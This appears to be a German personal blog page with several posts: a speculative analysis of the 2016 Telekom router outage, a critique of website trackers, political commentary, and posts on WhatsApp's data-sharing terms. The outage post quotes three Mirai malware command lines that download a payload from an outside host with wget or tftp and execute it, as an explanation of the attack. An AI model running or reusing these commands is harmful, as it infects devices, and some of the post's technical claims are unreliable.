Cyberwar oder einfach nur technisches Versagen?

Share Button

OK, ich lehne mich mit meiner Ansicht über die massive Telekom- Störung vom 27. November 2016 ziemlich weit aus dem spekulativen Fenster. Bei dieser Störung handelt es sich um den Ausfall von etwa 900000 Internetanschlüssen von ausschließlich Telekom- Kunden.

Quelle: Telekom
Quelle: Telekom

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat sich zu einem gewagten Statement hinreißen lassen:

Das BSI ordnet diesen Ausfall einem weltweiten Angriff auf ausgewählte Fernverwaltungsports von DSL-Routern zu. Dieser erfolgte, um die angegriffenen Geräte mit Schadsoftware zu infizieren. Diese Angriffe wurden auch in dem vom BSI geschützten Regierungsnetz registriert, in dem sie aber auf Grund funktionierender Schutzmaßnahmen folgenlos blieben.

Ich glaube nicht, dass ein Hackerangriff für den Ausfall von Routermodellen ausschließlich des Typs Speedport und nur bei der Telekom verantwortlich ist/war.

Was spricht gegen diese Theorie, womit übrigens bereits kräftig politisch Kapital daraus geschlagen und gleichzeitig das technische Versagen der Telekom verschleiert wird?

1. Es existierte eine Störungsmeldung der Telekom bereits vor bzw. parallel zu der prominenteren, wo über 900000 Kunden betroffen sind/waren. Die Störmeldung lautet wörtlich:

„Automatische Routerkonfiguration funktioniert teilweise nicht“.

Quelle: Telekom
Quelle: Telekom

Es wurde also versucht, automatisch Änderungen an der Konfiguration vorzunehmen, wie das z.B. bei Firmware- Updates üblich ist, wenn der Kunde den Zugang hierfür auf seinem Router geöffnet hat. Das muss jetzt nichts mit der Folgestörung zu tun haben, wäre aber plausibel für den Fall, dass die neu eingespielte Firmware fehlerhaft gewesen sein sollte.

2. Angenommen, es wäre tatsächlich ein Cyber- Angriff auf jene Speedport- Routermodelle mit einer entsprechenden Sicherheitslücke der Grund für die massenhaften Ausfälle, wäre das aus Sicht der Angreifer doch eher sinnlos. Cyber- Kriminelle würden sich ja selbst das eigene Ziel für ihre Aktionen versperren, indem sie diese Internetanschlüsse quasi abschalten. Das ergibt eigentlich keinen Sinn.

3. Die von der Telekom eingeleiteten Maßnahmen zur Problemlösung in Form eines Konfigurationsupgrades deuten eher darauf hin, dass ein typischer Konfigurationsfehler behoben werden soll, als dass eine augenscheinlich bekannte Sicherheitslücke geschlossen werden soll. Würde nur eine Sicherheitslücke geschlossen werden, würde man damit nicht unbedingt auch wieder die Internetverbindung herstellen.

4. Schaut man sich die Kommentare diverser betroffener Telekom- Kunden an, so konnten viele das Problem lösen, indem sie ihre Endgeräte manuell auf einen anderen DNS- Server eingestellt haben (z.B. 8.8.8.8 von Google). Da diese Leute danach erfolgreich das Internet über den angeblich manipulierten Router und dessen womöglich fehlerhafter DNS- Konfiguration nutzen konnten, ist das ein erhebliches Indiz dafür, dass schlicht ein Konfigurationsfehler im Router zu bemängeln wäre. Das könnte z.B. spekulativ, aber plausibel darauf zurückzuführen sein, dass ein automatisches Router- Update fehl schlug und dabei eine falsche Adresse des Telekom- DNS- Servers eingetragen wurde. Dieser Lösungsansatz, der ja auch nachweislich bei vielen Leuten funktionierte, würde die Theorie eines Cyber- Angriffs deutlich schwächen.

5. In der Telekom- Störungsmeldung wird außerdem berichtet, dass man den Hersteller des Routers in die Fehlerbeseitigung involviert hat. Wären Modelle anderer Hersteller ebenfalls betroffen, hätte man nicht von einem Hersteller (im Singular) gesprochen, was man bei solchen Cyber- Angriffen durchaus erwarten müsste. Durch die bisher allerdings spärlich vorhandenen Informationen deutet alles eher darauf hin, dass die besagten Routermodelle womöglich lapidar durch ein automatisches Update lahm gelegt wurden. Die Zahl von etwa 900000 betroffenen Geräten deutet wiederum darauf hin, dass zwar viele Anschlüsse betroffen waren, aber lange nicht alle, die diese Routermodelle verwenden. Das kann eventuell damit zu erklären sein, dass eben nicht alle Router für ein automatisches Upgrade freigeschaltet waren/sind. Da müsste man jetzt Feedback von Telekom- Kunden bekommen, die mit den gleichen Routermodellen eben nicht vom Ausfall betroffen gewesen sind und ob tatsächlich die automatische Updatefunktion abgeschaltet ist. (Immerhin einen solchen Telekom- Kunden kenne ich persönlich.)

6. Befasst man sich mit der vom BSI propagierten Sicherheitslücke näher, klingt deren Schlussfolgerung keineswegs plausibel. Man sieht das TR-069 Protokoll, welches für Fernwartungszwecke für Kunden- Router eingesetzt wird, als potentielle Sicherheitslücke und auch im aktuellen Fall verantwortlich für die massenhaften Ausfälle. Die Kommunikation erfolgt über den Port 7547, was aber nicht zwingend sein muss.

Hierzu existiert ein offizielles Statement der Telekom auf eine entsprechende Kundenanfrage aus dem Jahr 2014, als die Sicherheitslücke des TR-069 Protokolls publiziert wurde:https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

Quelle: https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

 

Genau genommen müssten die Hacker demnach eher die Management- Server der entsprechenden Provider angreifen, um tatsächlich Zugriff auf betroffenen Router zu erlangen. Der Aufwand in Bezug auf den zu erwartenden Nutzen wäre gering.  Es ist nicht ungewöhnlich, dass im Internet Ports gescannt werden und der Port 7547 (TR-069 bzw. TR-064) bildet keine ungewöhnliche Ausnahme. Der Angreifer müsste sich nach dieser These einen Remote- Zugang auf einen schwach geschützten Kunden- Router verschaffen, um dann wiederum eine Kommunikation zum Provider- Management- Server herstellen zu können. Dann müsste der Angreifer schließlich noch die Sicherheitshürden des entsprechenden Management- Servers überwinden, um schließlich Zugriff auf alle Kunden- Router, die die Fernwartungsschnittstelle geöffnet haben, zugreifen zu können. Das wäre unter Umständen mit viel Aufwand und Glück möglich, würde aber absolut keinen Sinn ergeben, indem man nach diesem Aufwand einfach nur die Kunden- Router vom Netz trennt und damit auch den eigenen Zugriff darauf unterbindet.

7. Und schließlich wäre es allein aus Analysezwecken interessant und wichtig gewesen, an betroffenen Anschlüssen mal andere Routermodelle zu verwenden, ob dadurch der Fehler hätte behoben werden können. Darüber schweigt man sich aus, denn es würde nachweisen, dass der Cyber- Angriff erfunden wäre. Andere Routermodelle verwenden ebenfalls jene Fernwartungsschnittstelle. Wieso waren absolut keine anderen Router als jene Speedport- Modelle betroffen?

Wie dem auch sei, mir kommt als jemand, der sich ein wenig mit IT- Technik auskennt, diese Geschichte ziemlich suspekt vor.

Zwischenzeitlich verbreitet sich die Nachricht, dass tatsächlich eine schlecht programmierte Malware gezielt DSL- Router mit der inzwischen als verantwortlich erklärten Sicherheitslücke für die Ausfälle zuständig gewesen sein soll.

Würde sich nur ein einziger Telekom- Kunde melden, dessen Speedport- Router nicht jene Easy- Support Funktion eingeschaltet hatte und auch nicht betroffen gewesen wäre, würde die Telekom in Erklärungsnot geraten. Denn betroffene Telekom- Kunden, die durch Änderung des DNS- Server- Eintrages im Router das Problem selbst lösen konnten, mussten ja hingegen vom Zugriff von außen schließlich betroffen gewesen sein. Wenn also beide Fälle nachzuweisen wären, wäre die Cyber- Attacke als Erklärung recht dürftig.

Update 29.11.2016

 

telekom_stoerung4atelekom_stoerung4btelekom_stoerung4ctelekom_stoerung4d

 

 

 

 

 

 

 

 

Für den Fall, dass doch tatsächlich ein Hacker- Angriff der Auslöser für diese Großstörung der Telekom gewesen sein sollte, muss man der Telekom grobe Fahrlässigkeit unterstellen.

Wie erwähnt, hat man die Telekom bereits 2014 auf diese mögliche Schwachstelle hingewiesen. Jedoch hat die Telekom diesen Hinweis nicht ernst genommen bzw. sogar ignoriert. Es wurde versichert, dass nur der Telekom- Server Zugriff per „Easy Support“ herstellen könnte…

Ein Auszug aus dem Code des berüchtigten Mirai- Virus:

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh

`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`

`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`

Grob gefasst, wird an das Gerät über einen Port, der nach außen, also in Richtung Internet, offen sein muss, eine entsprechende Anfrage gestellt. Das soll über den Port 7547 geschehen sein, der augenscheinlich für die Fernwartung von Seiten der Telekom für Speedport- Router standardmäßig geöffnet ist.

Das genügt jedoch nicht, um Befehle auszuführen. Hierfür muss natürlich vorher eine Authentifizierung erfolgen, ob die Remote- Anfrage auch berechtigt ist, Zugriff zu erhalten. Das scheint ja immerhin bei 900000 Routern der Telekom dann mit Erfolg praktiziert worden zu sein. Das Virus bedient sich dabei einem recht simplen Verfahren, indem es einfach der Reihe nach typische Standardpasswörter probiert. Danach können dann Befehle ausgeführt werden, die wie oben Daten nachladen, Berechtigungen von Dateien ändern usw.

Demnach wäre auch die Aussage auf die Frage im Jahr 2014 falsch, dass ausschließlich eine Verbindung zu einem Management- Server der Telekom über das TR-069 Protokoll möglich wäre.

Update 30.11.2016:

Die Anzeichen für einen Cyber- Angriff haben sich verdichtet. IT- Experten, allerdings nicht von der Telekom, haben den Angriff analysiert. Demnach war es kein gezielter Angriff durch russische Cyber- Soldaten, wie es zwischenzeitlich in den Medien propagiert wurde, sondern eben die übliche Prozedur von Internet- Kriminellen, welche Schwachstellen in der IoT- Umgebung (Internet of Things) permanent absuchen.

Die leider nicht geschlossenen Sicherheitslücken waren schließlich ausschlaggebend für das erfolgreiche Infizieren der Malware, welche wohl ein Derivat des berüchtigten Mirai- Virus war.

Die Speedport- Router waren auch nicht abgestürzt, sondern nur funktional eingeschränkt, da ja einige Telekom- Kunden durch das Ändern der DNS- Einträge auf den Endgeräten den Router immerhin noch als DSL- Modem verwenden konnten.

Die Aussagen von Seiten der Telekom bzw. des BSI, dass die Malware schlecht programmiert gewesen sein soll und dadurch nicht das eigentliche Ziel erreichte, sind falsch. Tatsächlich konnte die Malware nicht die Router- Software manipulieren, weil die Betriebssystem- Routinen nicht kompatibel mit der Programmiersprache (Linux) der Malware waren. Das deutet darauf hin, dass es definitiv kein gezielter Cyber- Angriff auf die Telekom- Infrastruktur gewesen sein kann.

Share Button

Nackt im Netz – Die Analyse zur NDR Sendung

Share Button

Der Panorama- Beitrag des NDR, Nackt im Netz, hat richtigerweise bei einigen Internetnutzern für  Sorgenfalten gesorgt. Dennoch denke ich, dass der Beitrag auch Defizite besitzt. Das möchte ich hiermit ergänzen:

Insbesondere haben die Autoren sich bei der Erhebung jener Daten auf Browser- Erweiterungen wie das erwähnte „WoT“ (Web of Trust) fixiert. Dabei sind es oft solche Browser- Erweiterungen, die den Schutz vor Ausspähung etwas minimieren können. Aufgrund einiger schwarzer Schafe unter den sogenannten AddOns halte ich es eher für kontraproduktiv, diese oft nützlichen Erweiterungen pauschal zu dämonisieren. Solche Programme wie „Ghostery“ erwirken durchaus eine höhere Privatsphäre. Die Browser selbst sind ebenfalls unterschiedlich geschwätzig und von Google’s Chrome ist definitiv abzuraten, wohingegen Mozilla Firefox oder dessen Modifikation Cliqz vorzuziehen wären.

Tatsächlich ist es gar nicht nötig, dass Browser- Erweiterungen für das Sammeln jener Daten eingesetzt werden, da der Anwender allein durch das Nutzen von Suchmaschinen wie Google diese Daten bereits ohne Zusatzprogramme aushändigt. Im Beitrag war das auch kurzzeitig zu sehen, wenn auch nicht explizit darauf eingegangen wurde. Der Browser selbst liefert diese Daten aus, was in manchen Fällen sogar unumgänglich für das Funktionieren zwischen Client (PC, Smartphone) und Server ist. Ein gewisses „Handshake“ zwischen den kommunizierenden technischen Systemen muss schlicht stattfinden. Man kann es aber auf ein Minimum reduzieren.

Indem man z.B. anstatt Google als Suchmaschine eine datenfreundliche Alternative wie „Startpage.com“ verwendet, reduziert man die Auslieferung von spezifischen Daten ungemein.

Ist man Nutzer von sozialen Netzwerken wie Facebook, sollte man sich jedes Mal nach der Nutzung richtig abmelden. Denn ansonsten kann Facebook aufgrund der bekannten Identität des Nutzers sogar Daten sammeln, wenn dieser sich anderswo in der virtuellen Welt bewegt. Man kann sich das so vorstellen, als würde man einen Hund an einen Baum mit einer quasi unendlich langen Leine anbinden. Wie ein GPS- Signal sendet das Gerät des Facebook- Benutzers, der sich nicht vom Dienst abgemeldet hat, den Standort und den Namen der jeweiligen Internetpräsenz an Facebook zurück.

Dass man, wo immer es möglich ist, nicht unbedingt seinen Klarnamen angeben und mit Auskünften über die eigene Person sparen sollte, wäre ebenfalls eine recht simple Möglichkeit, die eigenen Datenspuren zumindest teilweise zu verwischen. Verschlüsselung und Proxy- Nutzung runden ein schon ziemlich schlüssiges Sicherheitskonzept ab. Stichwort „Tor„.

Extrem wichtig ist auch das Unterbinden von sogenannten Trackern. Damit bezeichnet man kleine Code- Snippets, die in die Quellcodes von Internetseiten eingebaut werden. Sie dienen hauptsächlich dem Zweck, die Besucher sekundär zu analysieren und auszuwerten, indem alle möglichen Daten, die zwangsläufig zwischen Start- und Zielsystem ausgetauscht werden, primär gesammelt werden. Ich habe mir einmal die Mühe gemacht und habe einige „renommierte“ deutsche Internetpräsenzen danach untersucht, wie viele solcher Tracker dort ohne Einwilligung der Besucher deren Daten einsammeln (unvollständige Beispielliste):

trackerliste

 

Man könnte die Liste beliebig fortsetzen und in den meisten Fällen auch mehr oder weniger Tracker finden. Nun sind nicht alle Tracker gleichermaßen für die Privatsphäre gefährlich, dennoch wäre es die moralische Verpflichtung der Betreiber, mindestens die Besucher auf diese Datenerfassung hinzuweisen, natürlich bevor die Tracker aktiv werden. In der aktuellen Situation hat kein Anwender eine Chance, sich dagegen zu wehren, bestenfalls mit Anti- Tracker Programmen. Da klingt es beinahe schon schizophren, dass aktuell Branchen- Lobbyisten per Gesetz den Einsatz von sogenannten Ad- Blockern verbieten lassen wollen…

Der NDR setzt beispielsweise den Tracker „InfOnline“ ein, der das Besucheraufkommen messen soll. Es ist eine nutzbringende und strategische Information von Internetseitenbetreibern, bietet aber schon grundlegende Informationen zur Profilbildung. Der nächste Tracker „NetRatings SiteCensus“ besitzt schon eine andere Qualität. Auf der Internetpräsenz dieses Anbieters wird unverhohlen mit Marketing- Strategien aufgrund der gesammelten Daten geworben. Der 3. Tracker im Portfolio des NDR nennt sich „Digital Analytix“. Ich überlasse es jedem selbst, zu recherchieren, welche Daten die einzelnen Tracker sammeln und analysieren. Im Prinzip kann der NDR das sogar bequem im eigenen Haus tun, da ja der Sender als Kunde dieser Unternehmen das Ergebnis kostenpflichtig erhält. Für eine öffentlich- rechtliche Sendeanstalt halte ich das Tracken von Besuchern Ihrer Internetpräsenz durchaus für fragwürdig.

Da gibt es auch solche Tracker wie „Amazon Associates“, die z.B. dafür sorgen, dass die Internetnutzer auch die passende personalisierte Werbung erhalten und sich wundern, woher der Internetkonzern weiß, dass man tatsächlich nach diesen Dingen im Internet gesucht hat.

T- Online offenbart übrigens zusätzlich dubiose Geschäftspraktiken mit Tracking. Denn Kunden des Unternehmens sind schließlich gezwungen, über die Einstiegsseiten des Konzerns in ihren Online- Kundenbereich zu gelangen und werden somit ständig analysiert.  Netzpolitik.org bildet fast schon eine einsame und zugleich vorbildliche Ausnahme im Bereich der Nachrichtenportale und lässt seine Besucher in Ruhe.

Man darf aber nicht unerwähnt lassen, dass es auch Tracker gibt, die auch nützlich sind. Da wäre beispielsweise „Hupso“ zu erwähnen, der den Komfort bietet, dass Webinhalte schnell und einfach auf anderen Plattformen verbreitet werden können. Dabei werden natürlich auch Daten gesammelt, aber der Benutzer kann selbst entscheiden, ob er diesen Komfort nutzen möchte.

Und um nicht das Internet vollkommen verdammen zu wollen, hätte ich da noch einen kleinen Tipp: Warum drehen die Internetnutzer den Spieß nicht einfach um? Wer die genannten Möglichkeiten voll oder teilweise ausschöpft, um seine Daten gegenüber den Datenkraken zu verschleiern, kann z.B. eine dieser Datenkraken und zwar Facebook nutzen, um zu überprüfen, wie gut die eigenen Schutzmechanismen wirken. Denn Facebook bietet lustiger Weise die Möglichkeit, nachzusehen, weshalb ausgerechnet jene Werbeeinblendung angezeigt wird. Je unpräziser die Auswahlkriterien sind, desto besser hat die eigene Verschleierung funktioniert. Im Grunde kann man Facebook- Werbeeinblendungen als Indikator für das eigene Datenschutzkonzept missbrauchen 😉

 

Share Button

Tag der deutschen Uneinigkeit

Share Button

Im Jahr 2016 fanden die Feierlichkeiten  mit politischer Prominenz zum Tag der deutschen Einheit in Dresden statt. Dass die Örtlichkeit unglücklich gewählt wurde,   bestätigte sich durch  eine massive Präsenz von sogenannten Wutbürgern, die vorwiegend verbal die Teilnehmer der etablierten Parteien  bis hin zur Bundeskanzlerin zum Teil in beleidigender Form beschimpften.

Quelle: google.de
Quelle: google.de

Sogar der amerikanische Internetkonzern widmete diesem Ereignis temporär ein eigenes Logo.

Ausgerechnet in Ostdeutschland, wo Freiheit vor 1990 keinesfalls selbstverständlich war, schlägt zuweilen blinder Hass den Repräsentanten des vereinten Deutschlands entgegen. Irrsinnigerweise suchen die Protangonisten von Pegida, sogenannte Reichs- und Besorgtbürger sowie die  rechte Szene eine nicht vorhandene Legitimation für ihr Handeln in der Meinungsfreiheit, welche es ironischer Weise vor der Einheit in der ehemaligen DDR quasi nicht gab.

Offenkundig fehlt immer mehr Menschen die Gabe, Meinungsfreiheit von Beleidigung, Schmähung und Hetzparolen zu unterscheiden.  Dieser Tag ist der denkbar ungünstigste  Moment, der Welt zu zeigen, dass  man als Deutscher mit  der eigenen Regierung , deren Handeln und auch mit der eigenen Situation augenscheinlich unzufrieden ist. Jenseits der Staatsgrenzen müssen sich unsere Nachbarn verwundert betrachten, wie die Bürger eines wohlhabenden Landes auf hohem Niveau jammern.

Es entsteht der Eindruck, als würde das zurecht getadelte schlechte Management der Flüchtlingskrise Deutschland ins Chaos zu stürzen. Aber eigentlich verhindert die Gegenwehr von selbsternannten Rettern des Abendlandes ein Gelingen mehr als jene Migranten, die aus durchaus unterschiedlichen Hoffnungen nach Europa geflohen sind. Nicht alle sind Kriegsflüchtlinge und manche Migranten fallen tatsächlich unangehm auf. All diese Probleme löst man jedoch nicht damit, dass sich die eigene Bevölkerung in Gutmenschen und Besserdeutsche spaltet. Letztere skandieren auch gerne Parolen wie „Wir sind das Volk“, wobei sich längst nicht jeder mit dieser Definition verirrter Patrioten  identifizieren möchte. Wo waren all diese braven Bürger, als die Banken von ihren Steuergeldern gerettet wurden? Warum schimpften die besorgten Bürger nicht auf ihre Volksvertreter, als Finanzhaie, Zocker und Spekulanten den Staat ausplünderten? Islamophobie ist ja so einfach durch ein Kleidungsstück wie diese unheilvolle Burka zu erzeugen. Bad Banks hingegen sieht man eben nicht.

Verdient dieser Tag es eigentlich noch, ein Feiertag zu sein?

Share Button

Passivrauchen per WhatsApp!

Share Button

Herzlichen Dank an alle Benutzer des Messenger- Dienstes WhatsApp, welche den neuen und seit einigen Tagen gültigen Nutzungsbedingungen zugestimmt haben, insbesondere jene, die meine Telefonnummer in ihren Kontakten gespeichert haben.

Quelle: freeiconspng.com
Quelle: freeiconspng.com

Als Facebooknutzer habe ich peinlich genau darauf geachtet, dass keine persönlichen Daten der Öffentlichkeit Preis gegeben wurden. Was dennoch nicht vermeidbar war, habe ich fiktiv gestaltet. Einzig der Name entspricht der ungeschminkten Wahrheit, was im Prinzip auch ausreichen sollte. Trotz nerviger Aufforderungen habe ich meine Telefonnummer nie mitgeteilt. Denn die Telefonnummer ist ein ziemlich gutes Identifizierungsmerkmal und ist begehrt zur Erstellung von Nutzerprofilen. Das gehört zum Geschäftsmodell von Facebook.

Dank euch lieben Verwandten und Bekannten sowie Unbekannten, denen meine persönlichen Selbstbestimmungsrechte am Allerwertesten vorbeigingen, besitzt nun Facebook auch meine Telefonnummer mit dem dazugehörigen Namen, falls dieser in euren Kontaktdaten korrekt ausgeschrieben gespeichert war. Ich wollte niemals diese Daten herausgeben, aber ihr habt es einfach getan, ohne mich überhaupt zu fragen, ob ich es euch überhaupt erlauben würde. Auch wenn euch jeglicher Datenschutz egal ist und ihr euch exhibitionistisch durch die virtuelle Welt bewegen wollt, was gibt euch das Recht, diesen Lebensstil auch mir aufzuzwingen?

Was würdet ihr wohl dazu sagen, wenn plötzlich Staubsaugerverkäufer und Versicherungsvertreter sowie diverse Drückerkolonnen eure Wohnungstür ständig belagern würden, weil ich ihnen eure Adresse gegeben hätte?

Es ist ein wenig wie Passivrauchen oder Fluglärm. Es ist unverschämt, rücksichtlos und ignorant zugleich, andere Menschen in Mitleidenschaft zu ziehen, um eigene Interessen durchsetzen zu wollen.

Hintergrundinfos: http://soznet.org/654-2/

Anmerkung:

twitter_kommentare

Nicht ganz unberechtigt ist diese Kritik per Twitter. Im  ersten Moment mag es  absurd wirken,  einen solchen Artikel zu verfassen und selbst einen Facebook- Account zu besitzen.  Beschäftigt man sich etwas intensiver damit und kennt sich einigermaßen mit datenschutztechnischen Maßnahmen aus, kann man Facebook hervorragend als Indikator für die Wirkung eigener Datenschutzmaßnahmen verwenden.

facebook_werbung facebook_werbung1 facebook_werbung2

Facebook bietet nämlich die ausgesprochen informative Möglichkeit, sich anzuschauen, weshalb jene spezifische Werbung anzeigt wird.

Im 1. Fall stimmt lediglich der Einwahlknoten, der einmalig ein freier WLAN- Hotspot in St. Ingbert war. Schwerhörig bin ich glücklicherweise nicht und auch noch nicht in jenem gesetzten Alter.

Im 2. Fall könnte man immerhin annehmen, dass Facebook mein Alter kennt, allerdings habe ich meinen Geburtstag im Profil auf 1905 datiert. Also ist es ein sehr ungenauer Datenbestand, den Facebook über mich pflegt.

Auch im 3. Fall stochert Facebook bei der Analyse meines Datenprofils ziemlich im Dunkeln. Es ist Ihnen nur möglich, sehr vage Informationen über mich an ihre Werbepartner zu übermitteln. Mein falsches Geburtsdatum und die IP- Adresse des Proxyservers dessen Standort in Deutschland ist, ist quasi alles, was Facebook  von mir relativ gesichert weiß. Das ist fast nichts und falsch dazu und somit gut.

Der Einsatz von diversen Verschleierungsmaßnahmen und ein Mindestmaß an Freizügigkeit über die eigene Person zeigen effektive Wirkung. Wüssten Facebook’s Werbepartner, welch miserables Nutzerprofil ihnen der Datenkrake verkauft hat, würde es den Erfolg des Zuckerberg- Unternehmens erheblich ausbremsen, würden es viele andere Nutzer ähnlich handhaben.

Die Möglichkeit, dass man hier Kommentare mit dem Facebook- Profil verfassen kann, zwingt die Besucher, die tatsächlich Kommentare verfassen möchten, nicht dazu, es nicht auf die übliche Weise zu tun. Da auch auf dieser Internetpräsenz keine Tracker die Nutzerdaten erfassen und erst recht nicht an Facebook & Co. weiterleiten, ist diese Kritik ziemlich unberechtigt. Selbst nutze ich auch oft den Facebook- Account für Kommentare auf diversen Internetpräsenzen, da ich dadurch nicht überall einen eigenen Account anlegen muss. Da mein Facebook- Account quasi ohne Aussagekraft ist, erhält Facebook bestenfalls die Information, dass ein über 100 Jähriger, der am südlichsten Zipfel Südamerikas lebt, dennoch sich permanent in Deutschland aufzuhalten scheint, in einer Baumschule und in  Oxford  bildungstechnisch umtriebig war und von Beruf der Pressesprecher der fiktiven Diktatur Omnibrain aus einem Computerspiel zu sein vorgibt…

 

 

 

Share Button

What’s wrong with WhatsApp?

Share Button

Die im August 2016 geänderten Nutzungsbedingungen beim beliebten Messenger- Dienst WhatsApp sorgen unter den Anwendern für Irritationen.

Die wohl umstrittenste und auch datenschutzkritischste Änderung stellt die Weitergabe der eigenen Telefonnummer sowie die Daten aus dem Adressbuch des Smartphones an den Mutterkonzern Facebook dar. Außerdem wird auch das individuelle Nutzungsverhalten des WhatsApp- Anwenders weiter gegeben.

Quelle: whatsapp
Quelle: whatsapp

Das personalisiert den WhatsApp- Nutzer nun für Facebook, auch wenn dieser gar keinen Facebook- Account besitzt. Man muss die Formulierungen sehr genau beachten, denn sie werden oft und auch gerne falsch interpretiert.

Wenn du ein bestehender Benutzer bist, kannst du wählen, deine Account-Informationen nicht mit Facebook zu teilen, um deine Facebook-Werbung und Produkterlebnisse zu verbessern.

Die Facebook-Unternehmensgruppe wird diese Information trotzdem erhalten und für andere Zwecke, wie Verbesserung von Infrastruktur und Zustellsystemen, des Verstehens der Art der Nutzung unserer bzw. ihrer Dienste, der Absicherung der Systeme und der Bekämpfung von Spam, Missbrauch bzw. Verletzungshandlungen.

Ob viele Nutzer nun diese Nutzungsbedingungen nicht richtig verstehen oder unbewusst falsch interpretieren, es bleibt schlichtweg Tatsache, dass WhatsApp zukünftig die Telefonnummern aller Nutzer an Facebook weiter gibt. Es ist außerdem ein Trugschluss zu glauben, dass hierfür der WhatsApp- Nutzer auch gleichzeitig einen Facebook- Account besitzen müsste. Das ist völlig irrelevant und steht auch gar nicht so im Text. Technisch spielt das nämlich keine Rolle.

Was man lediglich mit der Verweigerung dieser Zustimmung erreichen kann, ist, dass Facebook, sofern auch ein Facebook- Account des WhatsApp- Nutzers existieren würde, diese Daten nicht mit anderen Facebook- Nutzern und Werbepartnern automatisch „geteilt“ werden und damit die personalisierte Werbung bei Facebook optimiert wird im Sinne der Werbepartner. Es ist mit keinem Wort dargelegt worden, dass die Daten nicht zu anderen Zwecken verwendet werden. Davon ist allerdings auszugehen und wird auch so in den Nutzungsbedingungen bestätigt. So darf man davon ausgehen, dass mit dem Kriterium „Telefonnummer“ die Personalisierung von Nutzerprofilen sehr genau werden wird. Man darf natürlich auch damit rechnen, dass diese wertvollen Daten monetär genutzt werden, wenn auch nicht direkt als Facebook- Werbeeinblendung.

Man kann also konstatieren, dass mit Nutzerdaten von WhatsApp- Anwendern irgendwie irgendwo Datenbanken von Facebook gespeist werden. Wie diese Daten schließlich verwendet werden, bleibt völlig unklar.

Ein weiteres negatives Highlight der neuen Nutzungsbedingungen von WhatsApp stellt diese Passage dar:

Du stellst uns regelmäßig die Telefonnummern von WhatsApp-Nutzern und deinen sonstigen Kontakten in deinem Mobiltelefon-Adressbuch zur Verfügung. Du bestätigst, dass du autorisiert bist, uns solche Telefonnummern zur Verfügung zu stellen, damit wir unsere Dienste anbieten können.

Es wird jedem WhatsApp- Anwender schwer fallen, bestätigen zu können, dass man autorisiert ist, die Telefonnummern aller gespeicherten Kontakte auf dem Mobilgerät an Facebook weiter zu geben. Genau genommen macht man sich strafbar bzw. juristisch angreifbar, wenn man WhatsApp weiterhin benutzt. Man könnte bestenfalls alle Kontaktdaten entfernen, wovon nicht explizit eine Einwilligung zur Weitergabe derer Daten vorliegt. WhatsApp bzw. Facebook versucht sich mit dieser Klausel geschickt aus bestehenden Datenschutzrichtlinien heraus zu winden und verlagert sicher eintretende Verstöße auf seine Anwender. Das ist einerseits extrem fies und andererseits bestimmt bald ein Thema für den Bundesdatenschutzbeauftragten bzw. für den Bundesjustizminister.

Wer unter diesen Umständen weiterhin WhatsApp nutzen sollte, verhält sich gegenüber all seinen Kontakten im Adressbuch höchst verantwortungslos. Was jeder Einzelne dazu veranlasst, seine persönlichen Daten an Konzerne und völlig unbekannte Dritte heraus zu geben, ist dagegen die eigene freie Entscheidung.

Update 16. September 2016:

Die Bundesbeauftragte für den Datenschutz und die Informationsfreiheit

Az. 24-501-1 II#2613

Sehr geehrter Herr B.

haben Sie vielen Dank für Ihre Anfrage vom 1.9.2016, in der Sie die Änderungen der Nutzungsbedingungen von WhatsApp kritisieren. Mit den Änderungen wird festgelegt, dass WhatsApp die Mobilfunkrufnummer des Nutzers und alle in seinem Adressbuch verzeichneten Rufnummern für Werbezwecke an Facebook weitergibt, unabhängig davon, ob es sich um Nutzer von Facebook handelt.

WhatsApp wurde im Herbst 2014 von dem US-amerikanischen Unternehmen Facebook übernommen. Die zunächst geltende Zusicherung, die Daten beider Dienste getrennt zu halten, wird mit den neuen Nutzungsbedingungen aufgehoben. Dem Nutzer wird lediglich ein befristetes Widerspruchsrecht und dies auch nur für die Nutzung der Rufnummer eingeräumt, die Weitergabe findet in jedem Fall statt.

Als Anbieter eines Telekommunikationsdienstes unterfällt WhatsApp, soweit deutsche Nutzer betroffen sind, den Regelungen des Telekommunikationsgesetzes (TKG). Danach ist die Übermittlung der Rufnummern an eine andere Stelle nicht zulässig, es sei denn, der Nutzer hat ausdrücklich eingewilligt. Auch die geforderte Bestätigung des Nutzers, dass die Zustimmung aller Kontakte zur Weitergabe der Daten eingeholt wurde, ist in Frage zu stellen.

Ich habe WhatsApp auf den Verstoß gegen deutsches Telekommunikationsrecht hingewiesen und zur Stellungnahme aufgefordert.

Unabhängig davon hat sich nach hiesigen Informationen auch die US-amerikanische Federal Trade Commission (FTC) eingeschaltet. Nach dortigem Recht liegt ein Verstoß gegen eine Anordnung der FTC vor, wonach sowohl Facebook als auch WhatsApp verpflichtet sind, bei Änderung der Geschäftspraktiken hinsichtlich der Verwendung der WhatsApp-Nutzerdaten die ausdrückliche Einwilligung des einzelnen Nutzers einzuholen.

Mit freundlichen Grüßen

**********************************************

Die Bundesbeauftragte für den Datenschutz

und die Informationsfreiheit

Referat ZA

– Servicebüro –

Husarenstr. 30

53117 Bonn

Tel.: +49 (0)228 997799-0

Fax:  +49 (0)228 997799-550

E-Mail: servicebuero@bfdi.bund.de

***********************************************

 

Share Button

Des Königs neue Kleider

Share Button

Eher selten verwende ich für Artikel die erste Person Singular. Weil ich aber in diesem Fall meine ganz persönliche Sichtweise präsentiere, wird es ausnahmsweise so sein.

Seit Monaten tobt eine heftige Debatte über Kleidungsstücke angeblich religiösen Ursprungs. Es geht augenscheinlich um traditionelle Verhüllungspraktiken muslimischer Frauen. Die Vollverschleierung Burka und die geringfügig freizügigere Variante Niqab sowie der aus konservativ muslimischer Sicht halbwegs badetaugliche Burkini sorgen für Wirbel und diverse Irritationen.

Mir ist es grundsätzlich egal, wie sich Leute kleidungstechnisch in der Öffentlichkeit darbieten. Ich sehe auch keinen direkten Zusammenhang zwischen diesen Kleidungsstücken und einer davon ausgehenden Terrorgefahr. Ich beobachte allerdings eine schleichende Zunahme dieser Kleidungsstücke, was durchaus der erhöhten Migration aus islamischen Ländern geschuldet sein mag.

